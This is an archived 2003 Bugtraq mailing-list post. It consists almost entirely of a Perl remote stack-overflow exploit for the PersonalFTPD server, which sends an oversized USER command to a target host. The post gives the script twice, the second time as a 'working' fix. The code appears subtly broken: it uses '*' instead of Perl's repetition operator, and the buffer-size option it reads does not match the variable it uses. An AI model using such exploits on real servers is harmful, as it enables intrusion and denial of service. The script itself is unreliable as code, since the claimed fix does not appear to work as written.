('binary' encoding is not supported, stored as-is) In-Reply-To: <20030508081123.13047.qmailat_private> >Received: (qmail 20952 invoked from network); 8 May 2003 14:15:36 -0000 >Received: from outgoing2.securityfocus.com (205.206.231.26) > by mail.securityfocus.com with SMTP; 8 May 2003 14:15:36 -0000 >Received: from lists.securityfocus.com (lists.securityfocus.com [205.206.231.19]) > by outgoing2.securityfocus.com (Postfix) with QMQP > id ED2648F2D9; Thu, 8 May 2003 08:19:59 -0600 (MDT) >Mailing-List: contact bugtraq-helpat_private; run by ezmlm >Precedence: bulk >List-Id: <bugtraq.list-id.securityfocus.com> >List-Post: <mailto:bugtraqat_private> >List-Help: <mailto:bugtraq-helpat_private> >List-Unsubscribe: <mailto:bugtraq-unsubscribeat_private> >List-Subscribe: <mailto:bugtraq-subscribeat_private> >Delivered-To: mailing list bugtraqat_private >Delivered-To: moderator for bugtraqat_private >Received: (qmail 22205 invoked from network); 8 May 2003 07:49:14 -0000 >Date: 8 May 2003 08:11:23 -0000 >Message-ID: <20030508081123.13047.qmailat_private> >Content-Type: text/plain >Content-Disposition: inline >Content-Transfer-Encoding: binary >MIME-Version: 1.0 >X-Mailer: MIME-tools 5.411 (Entity 5.404) >From: subj <r2subj3ctat_private> >To: bugtraqat_private >Subject: Remote Stack Overflow exploit for Personal FTPD > > > >#!/usr/bin/perl >use IO::Socket; > >########################################################## ># # ># Remote Stack Overflow sploit for PersonalFTPD # ># If wanna talk with me find me on irc # ># irc.irochka.net #dwc, #global, #phreack # ># ###################################################### # ># thanx to kabuto, drG4njubas, fnq # ># gr33tz to dhg, gipshack, rsteam, blacktigerz # ># D4rkGr3y, r4ShRaY, DethSpirit, J0k3r, Foster, nik0 # ># ORB, Moby, 3APA3A, euronymous, L0vCh1Y, d1z # ># ###################################################### # ># Vulnerability links: # ># http://security.nnov.ru/search/document.asp?docid=4309 # ># http://www.securityfocus.com/archive/1/316958 # ># # >########################################################## > >$data = "A"; > >print "[..] ::::::::::::::::::::::::::::::::::::::::::::: [..]\n"; >print "[..] Remote Stack Overflow sploit for PersonalFTPD [..]\n"; >print "[..] by subj | dwc :: big 10x to Kabuto [..]\n"; >print "[..] www.dwcgr0up.com www.dwcgr0up.com/subj/ [..]\n"; >print "[..] ::::::::::::::::::::::::::::::::::::::::::::: [..]\n\n"; > >$count_param=@ARGV; >$n="0"; >if ($count_param==0) {print "Usage: -h - host, -p - port, -b - buffer >size\n\n"; exit; } >while ($n<$count_param) { >if ($ARGV[$n] eq "-h") {$server=$ARGV[$n+1];} >if ($ARGV[$n] eq "-p") {$port=$ARGV[$n+1];} >if ($ARGV[$n] eq "-b") {$buf=$ARGV[$n+1];} >$n++; >} >&connect; > >sub connect >{ >$sock = IO::Socket::INET->new(PeerAddr => "$server", PeerPort => "$port", >Proto => "tcp") > || die "Can\'t connect to $server port $port\n"; >print $sock "USER $buffer\n"; >print "Buffer has beens sended..."; > >} > > >close($sock); >exit; > -------------------------------------------------------------------------- I bring the apologies, has laid out not working version, simply was mistaken a file, before $sock it is necessary to add $buffer. = $data * $bsize; Working code #!/usr/bin/perl use IO::Socket; ########################################################## # # # Remote Stack Overflow sploit for PersonalFTPD # # If wanna talk with me find me on irc # # irc.irochka.net #dwc, #global, #phreack # # ###################################################### # # thanx to kabuto, drG4njubas, fnq # # gr33tz to dhg, gipshack, rsteam, blacktigerz # # D4rkGr3y, r4ShRaY, DethSpirit, J0k3r, Foster, nik0 # # ORB, Moby, 3APA3A, euronymous, L0vCh1Y, d1z # # ###################################################### # # Vulnerability links: # # http://security.nnov.ru/search/document.asp?docid=4309 # # http://www.securityfocus.com/archive/1/316958 # # # ########################################################## $data = "A"; print "[..] ::::::::::::::::::::::::::::::::::::::::::::: [..]\n"; print "[..] Remote Stack Overflow sploit for PersonalFTPD [..]\n"; print "[..] by subj | dwc :: big 10x to Kabuto [..]\n"; print "[..] www.dwcgr0up.com www.dwcgr0up.com/subj/ [..]\n"; print "[..] ::::::::::::::::::::::::::::::::::::::::::::: [..]\n\n"; $count_param=@ARGV; $n="0"; if ($count_param==0) {print "Usage: -h - host, -p - port, -b - buffer size\n\n"; exit; } while ($n<$count_param) { if ($ARGV[$n] eq "-h") {$server=$ARGV[$n+1];} if ($ARGV[$n] eq "-p") {$port=$ARGV[$n+1];} if ($ARGV[$n] eq "-b") {$buf=$ARGV[$n+1];} $n++; } &connect; sub connect { $buffer.= $data * $bsize; $sock = IO::Socket::INET->new(PeerAddr => "$server", PeerPort => "$port", Proto => "tcp") || die "Can\'t connect to $server port $port\n"; print $sock "USER $buffer\n"; print "Buffer has beens sended..."; } close($sock); exit;
This archive was generated by hypermail 2b30 : Thu May 08 2003 - 13:08:50 PDT